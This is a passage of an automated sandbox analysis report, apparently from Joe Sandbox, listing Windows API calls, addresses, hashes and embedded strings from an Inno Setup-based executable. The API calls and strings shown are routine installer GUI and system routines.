                                                                              • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                              • API String ID: 754982922-1448842058
                                                                              APIs
                                                                              • GetCapture.USER32 ref: 00422EB4
                                                                              • GetCapture.USER32 ref: 00422EC3
                                                                              • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EC9
                                                                              • ReleaseCapture.USER32 ref: 00422ECE
                                                                              • GetActiveWindow.USER32 ref: 00422EDD
                                                                              • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F5C
                                                                              • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FC0
                                                                              • GetActiveWindow.USER32 ref: 00422FCF
                                                                              Similarity
                                                                              • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                              • String ID:
                                                                              • API String ID: 862346643-0
                                                                              APIs
                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 0042F12E
                                                                              • GetWindowLongA.USER32(?,000000EC), ref: 0042F145
                                                                              • GetActiveWindow.USER32 ref: 0042F14E
                                                                              • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F17B
                                                                              • SetActiveWindow.USER32(?,0042F2AB,00000000,?), ref: 0042F19C
                                                                              Similarity
                                                                              • API ID: Window$ActiveLong$Message
                                                                              • String ID:
                                                                              • API String ID: 2785966331-0
                                                                              APIs
                                                                              • 73A1A570.USER32(00000000), ref: 0042949A
                                                                              • GetTextMetricsA.GDI32(00000000), ref: 004294A3
                                                                                • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 004294B2
                                                                              • GetTextMetricsA.GDI32(00000000,?), ref: 004294BF
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 004294C6
                                                                              • 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294CE
                                                                              • GetSystemMetrics.USER32(00000006), ref: 004294F3
                                                                              • GetSystemMetrics.USER32(00000006), ref: 0042950D
                                                                              Similarity
                                                                              • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                                              • String ID:
                                                                              • API String ID: 361401722-0
                                                                              APIs
                                                                              • 73A1A570.USER32(00000000,?,00419069,004970A2), ref: 0041DE37
                                                                              • 73A24620.GDI32(00000000,0000005A,00000000,?,00419069,004970A2), ref: 0041DE41
                                                                              • 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419069,004970A2), ref: 0041DE4E
                                                                              • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE5D
                                                                              • GetStockObject.GDI32(00000007), ref: 0041DE6B
                                                                              • GetStockObject.GDI32(00000005), ref: 0041DE77
                                                                              • GetStockObject.GDI32(0000000D), ref: 0041DE83
                                                                              • LoadIconA.USER32(00000000,00007F00), ref: 0041DE94
                                                                              Similarity
                                                                              • API ID: ObjectStock$A24620A480A570IconLoad
                                                                              • String ID:
                                                                              • API String ID: 3573811560-0
                                                                              APIs
                                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 00462A6C
                                                                              • SetCursor.USER32(00000000,00000000,00007F02,00000000,00462B01), ref: 00462A72
                                                                              • SetCursor.USER32(?,00462AE9,00007F02,00000000,00462B01), ref: 00462ADC
                                                                              Similarity
                                                                              • API ID: Cursor$Load
                                                                              • String ID: $ $Internal error: Item already expanding
                                                                              • API String ID: 1675784387-1948079669
                                                                              APIs
                                                                              • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00475755
                                                                              • 73A259E0.USER32(00000000,000000FC,004756B0,00000000,00475994,?,00000000,004759BE), ref: 0047577C
                                                                              • GetACP.KERNEL32(00000000,00475994,?,00000000,004759BE), ref: 004757B9
                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004757FF
                                                                              Similarity
                                                                              • API ID: A259ClassInfoMessageSend
                                                                              • String ID: COMBOBOX$Inno Setup: Language
                                                                              • API String ID: 3217714596-4234151509
                                                                              APIs
                                                                              • GetSystemDefaultLCID.KERNEL32(00000000,00408970,?,?,?,?,00000000,00000000,00000000,?,00409977,00000000,0040998A), ref: 00408742
                                                                                • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                • Part of subcall function 004085BC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087BE,?,?,?,00000000,00408970), ref: 004085CF
                                                                              Similarity
                                                                              • API ID: InfoLocale$DefaultSystem
                                                                              • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                              • API String ID: 1044490935-665933166
                                                                              APIs
                                                                              • GetVersion.KERNEL32(00000000,00411909), ref: 0041179C
                                                                              • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041185A
                                                                                • Part of subcall function 00411ABC: CreatePopupMenu.USER32 ref: 00411AD6
                                                                              • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118E6
                                                                                • Part of subcall function 00411ABC: CreateMenu.USER32 ref: 00411AE0
                                                                              • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118CD
                                                                              Similarity
                                                                              • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                              • String ID: ,$?
                                                                              • API String ID: 2359071979-2308483597
                                                                              APIs
                                                                              • GetObjectA.GDI32(?,00000018,?), ref: 0041BF38
                                                                              • GetObjectA.GDI32(?,00000018,?), ref: 0041BF47
                                                                              • GetBitmapBits.GDI32(?,?,?), ref: 0041BF98
                                                                              • GetBitmapBits.GDI32(?,?,?), ref: 0041BFA6
                                                                              • DeleteObject.GDI32(?), ref: 0041BFAF
                                                                              • DeleteObject.GDI32(?), ref: 0041BFB8
                                                                              • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFD5
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                              • String ID:
                                                                              • API String ID: 1030595962-0
                                                                              • Opcode ID: c1e7ff30722f84a59b7c576368abad4b11806281d6eddf659bf093bc56a2286c
                                                                              • Instruction ID: b628a60b6e344882d317dd96d191c0cb792f95d1e2fbfe9e34044ce63643746d
                                                                              • Opcode Fuzzy Hash: c1e7ff30722f84a59b7c576368abad4b11806281d6eddf659bf093bc56a2286c
                                                                              • Instruction Fuzzy Hash: 48510571E00219AFCB14DFA9C8819EEBBF9EF48314B11442AF914E7391D738AD81CB64
                                                                              APIs
                                                                              • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CF0E
                                                                              • 73A24620.GDI32(00000000,00000026), ref: 0041CF2D
                                                                              • 73A18830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF93
                                                                              • 73A122A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CFA2
                                                                              • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041D00C
                                                                              • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D04A
                                                                              • 73A18830.GDI32(?,?,00000001,0041D07C,00000000,00000026), ref: 0041D06F
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Stretch$A18830$A122A24620BitsMode
                                                                              • String ID:
                                                                              • API String ID: 430401518-0
                                                                              • Opcode ID: d1728d26c473023a034cda29587c75d8a44e61feb8d5ac31eb3562e546440a0c
                                                                              • Instruction ID: 415929d19c0355200a34ec50ec85ee50bdb26205500aadc12dd1df5ccaef5bc8
                                                                              • Opcode Fuzzy Hash: d1728d26c473023a034cda29587c75d8a44e61feb8d5ac31eb3562e546440a0c
                                                                              • Instruction Fuzzy Hash: 7A514EB0604200AFD714DFA9C995F9BBBF9EF08304F10859AB549DB292C779ED81CB58
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,?,?), ref: 00456526
                                                                                • Part of subcall function 0042428C: GetWindowTextA.USER32(?,?,00000100), ref: 004242AC
                                                                                • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                • Part of subcall function 0041EEB4: 73A25940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
                                                                                • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0045658D
                                                                              • TranslateMessage.USER32(?), ref: 004565AB
                                                                              • DispatchMessageA.USER32(?), ref: 004565B4
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Message$TextWindow$A25940CurrentDispatchSendThreadTranslate
                                                                              • String ID: [Paused]
                                                                              • API String ID: 3047529653-4230553315
                                                                              • Opcode ID: dc734b73e23721f0060ca7094c6900a610c91b21ae2acdfdba29acc3faa202e8
                                                                              • Instruction ID: b21e1f9e90a9f2d36a55999f4aec8319d50e535270b7c0faa20aeab8e88a7384
                                                                              • Opcode Fuzzy Hash: dc734b73e23721f0060ca7094c6900a610c91b21ae2acdfdba29acc3faa202e8
                                                                              • Instruction Fuzzy Hash: 9B310B70904248AEDB01DBB5DC41BCE7BB8EB0D314F95407BF800E3296D67C9909CBA9
                                                                              APIs
                                                                              • GetCursor.USER32(00000000,0046A767), ref: 0046A6E4
                                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 0046A6F2
                                                                              • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046A767), ref: 0046A6F8
                                                                              • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046A767), ref: 0046A702
                                                                              • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046A767), ref: 0046A708
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Cursor$LoadSleep
                                                                              • String ID: CheckPassword
                                                                              • API String ID: 4023313301-1302249611
                                                                              • Opcode ID: 0cd4e794cb0659d1b4c7be91935d04c2b5f54db07be9f479e0bdba40b14c3856
                                                                              • Instruction ID: 8e453c91c0c590c9759b614a584e43fa839bbbc5a3d1c7197c153ffb71e3d1f4
                                                                              • Opcode Fuzzy Hash: 0cd4e794cb0659d1b4c7be91935d04c2b5f54db07be9f479e0bdba40b14c3856
                                                                              • Instruction Fuzzy Hash: 36319334640604AFD711EB69C989F9E7BE0EF05305F5580B6F844AB3A2D778EE00CB5A
                                                                              APIs
                                                                                • Part of subcall function 0047663C: GetWindowThreadProcessId.USER32(00000000), ref: 00476644
                                                                                • Part of subcall function 0047663C: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,0047673B,0049B050,00000000), ref: 00476657
                                                                                • Part of subcall function 0047663C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0047665D
                                                                              • SendMessageA.USER32(00000000,0000004A,00000000,00476ACE), ref: 00476749
                                                                              • GetTickCount.KERNEL32 ref: 0047678E
                                                                              • GetTickCount.KERNEL32 ref: 00476798
                                                                              • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 004767ED
                                                                              Strings
                                                                              • CallSpawnServer: Unexpected response: $%x, xrefs: 0047677E
                                                                              • CallSpawnServer: Unexpected status: %d, xrefs: 004767D6
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                              • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                              • API String ID: 613034392-3771334282
                                                                              • Opcode ID: aa8cf3b1ca808e1997025c551cec6cc8e4be10c38fa863c1333764af79a3be99
                                                                              • Instruction ID: 71a83a78c23d55d33e7515897efa00ecebce1ccd6bd4cc0fbedfc923aec738ff
                                                                              • Opcode Fuzzy Hash: aa8cf3b1ca808e1997025c551cec6cc8e4be10c38fa863c1333764af79a3be99
                                                                              • Instruction Fuzzy Hash: 7831C074F006149ADB10EBB9C8827EEB3E29F04304F91843BB548EB382D67C8D018B9D
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 00458F5F
                                                                              Strings
                                                                              • CreateAssemblyCache, xrefs: 00458F56
                                                                              • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 00458F6A
                                                                              • .NET Framework CreateAssemblyCache function failed, xrefs: 00458F82
                                                                              • Failed to load .NET Framework DLL "%s", xrefs: 00458F44
                                                                              • Fusion.dll, xrefs: 00458EFF
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc
                                                                              • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                              • API String ID: 190572456-3990135632
                                                                              • Opcode ID: e7405bef0de90a1b20b21130be7ac328c98422d0360e923e9ad54989aa78f0ae
                                                                              • Instruction ID: b0fae5d47ad60a87b9f111cdb81e12311f6487f55351a3ce1c195c50c1487ae5
                                                                              • Opcode Fuzzy Hash: e7405bef0de90a1b20b21130be7ac328c98422d0360e923e9ad54989aa78f0ae
                                                                              • Instruction Fuzzy Hash: 31317971E00605ABCB00DFA5C88169EB7B5AF48315F50857FE814F7382DF7899098799
                                                                              APIs
                                                                                • Part of subcall function 0041C058: GetObjectA.GDI32(?,00000018), ref: 0041C065
                                                                              • GetFocus.USER32 ref: 0041C178
                                                                              • 73A1A570.USER32(?), ref: 0041C184
                                                                              • 73A18830.GDI32(?,?,00000000,00000000,0041C203,?,?), ref: 0041C1A5
                                                                              • 73A122A0.GDI32(?,?,?,00000000,00000000,0041C203,?,?), ref: 0041C1B1
                                                                              • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1C8
                                                                              • 73A18830.GDI32(?,00000000,00000000,0041C20A,?,?), ref: 0041C1F0
                                                                              • 73A1A480.USER32(?,?,0041C20A,?,?), ref: 0041C1FD
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: A18830$A122A480A570BitsFocusObject
                                                                              • String ID:
                                                                              • API String ID: 2231653193-0
                                                                              • Opcode ID: 6a39f5637e621883ca0517ce44c3b694a92d9286788943b8a56663a62e87c7eb
                                                                              • Instruction ID: a51b9c7cee13939b32e911f1849152ebfa7eb0d73570b73294f05c7218cf190f
                                                                              • Opcode Fuzzy Hash: 6a39f5637e621883ca0517ce44c3b694a92d9286788943b8a56663a62e87c7eb
                                                                              • Instruction Fuzzy Hash: A0116A71E40609BBDB10DBE9CC85FAFBBFCEF48700F54446AB518E7281D67899008B28
                                                                              APIs
                                                                              • GetSystemMetrics.USER32(0000000E), ref: 00418C80
                                                                              • GetSystemMetrics.USER32(0000000D), ref: 00418C88
                                                                              • 6F532980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C8E
                                                                                • Part of subcall function 004099C0: 6F52C400.COMCTL32(0049A628,000000FF,00000000,00418CBC,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004099C4
                                                                              • 6F59CB00.COMCTL32(0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CDE
                                                                              • 6F59C740.COMCTL32(00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CE9
                                                                              • 6F59CB00.COMCTL32(0049A628,00000001,?,?,00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000), ref: 00418CFC
                                                                              • 6F530860.COMCTL32(0049A628,00418D1F,?,00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E), ref: 00418D12
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: MetricsSystem$C400C740F530860F532980
                                                                              • String ID:
                                                                              • API String ID: 209721339-0
                                                                              • Opcode ID: 77375f6f841bd32482ac362321ef56034a1adac8671eb50e5d38b587b56b4f6d
                                                                              • Instruction ID: 436211bc77980f3f3c6a2ba6eafd8e316937a2835f40b04245610037118c4977
                                                                              • Opcode Fuzzy Hash: 77375f6f841bd32482ac362321ef56034a1adac8671eb50e5d38b587b56b4f6d
                                                                              • Instruction Fuzzy Hash: FB1149B1744204BBDB10EBA9DC83F5E73B8DB48704F6044BABA04E72D2DA799D409759
                                                                              APIs
                                                                                • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00482098), ref: 0048207D
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpen
                                                                              • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                              • API String ID: 47109696-2530820420
                                                                              • Opcode ID: 3270de2230ad746d97d59dd4353e0cd3c44e793d3e1148cc667fa9374d6162f5
                                                                              • Instruction ID: 2fd02ba07ad27dcdf7cb645fdb5409a97311ae270af1ac1656c6f1dc0261d506
                                                                              • Opcode Fuzzy Hash: 3270de2230ad746d97d59dd4353e0cd3c44e793d3e1148cc667fa9374d6162f5
                                                                              • Instruction Fuzzy Hash: 4911D030604208AADB10F6A29E02B5F7AA8DB42354F508877AA01E7292E7BE8D45D75D
                                                                              APIs
                                                                              • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                              • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                              • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                              • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                              • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                              • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                              Similarity
                                                                              • API ID: ObjectSelect$Delete$Stretch
                                                                              • String ID:
                                                                              • API String ID: 1458357782-0
                                                                              • Opcode ID: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                              • Instruction ID: 28529174ed8a1a36c66279ad8c479dcd7ed434ba0fbaa502c63cdd0cc078bbc5
                                                                              • Opcode Fuzzy Hash: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                              • Instruction Fuzzy Hash: A1114C72E40559ABDF10D6D9D885FAFB3BCEF08704F048456B614FB241C678A8418B54
                                                                              APIs
                                                                              • 73A1A570.USER32(00000000,?,?,00000000), ref: 00493979
                                                                                • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0049399B
                                                                              • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00493F19), ref: 004939AF
                                                                              • GetTextMetricsA.GDI32(00000000,?), ref: 004939D1
                                                                              • 73A1A480.USER32(00000000,00000000,004939FB,004939F4,?,00000000,?,?,00000000), ref: 004939EE
                                                                              Strings
                                                                              • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 004939A6
                                                                              Similarity
                                                                              • API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
                                                                              • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                              • API String ID: 1435929781-222967699
                                                                              • Opcode ID: 4da94c4e869f50116a306e6e5405a5310ab38c3bec03186d5db38c66856040fc
                                                                              • Instruction ID: ca21cbf5bcaba7d36ec51d0fe3022430e72f204859a7c427f36f75f4196156c5
                                                                              • Opcode Fuzzy Hash: 4da94c4e869f50116a306e6e5405a5310ab38c3bec03186d5db38c66856040fc
                                                                              • Instruction Fuzzy Hash: B30165B6644644AFDB00DFA9CC42F6FB7ECDB49704F514476B504E7281D6789E008B24
                                                                              APIs
                                                                              • GetCursorPos.USER32 ref: 004233BF
                                                                              • WindowFromPoint.USER32(?,?), ref: 004233CC
                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233DA
                                                                              • GetCurrentThreadId.KERNEL32 ref: 004233E1
                                                                              • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233FA
                                                                              • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423411
                                                                              • SetCursor.USER32(00000000), ref: 00423423
                                                                              Similarity
                                                                              • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                              • String ID:
                                                                              • API String ID: 1770779139-0
                                                                              • Opcode ID: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
                                                                              • Instruction ID: 219e0d69ac6b6a38dcb61baa39fbc914f783b163521ae56cddb293ea60412e1c
                                                                              • Opcode Fuzzy Hash: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
                                                                              • Instruction Fuzzy Hash: E601D42230472036D6217B795C86E2F26A8CFC5B15F50457FB649BB283DA3D8C0063BD
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(user32.dll), ref: 0049379C
                                                                              • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 004937A9
                                                                              • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 004937B6
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleModule
                                                                              • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                              • API String ID: 667068680-2254406584
                                                                              • Opcode ID: bc243d748a11952884276210872aa95fdf32b4a39955ab03d8a14887b4b54015
                                                                              • Instruction ID: addf7fefb297577c5f12cb6f7e4bbe149f94bc2dbc72dea36d33d0c0dd90845d
                                                                              • Opcode Fuzzy Hash: bc243d748a11952884276210872aa95fdf32b4a39955ab03d8a14887b4b54015
                                                                              • Instruction Fuzzy Hash: 74F0F6D274171467DA2069F60C82F7BAACCDB93762F148077BD05A7382E99D8E0542FE
                                                                              APIs
                                                                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00457220
                                                                              • GetExitCodeProcess.KERNEL32(?,lI), ref: 00457241
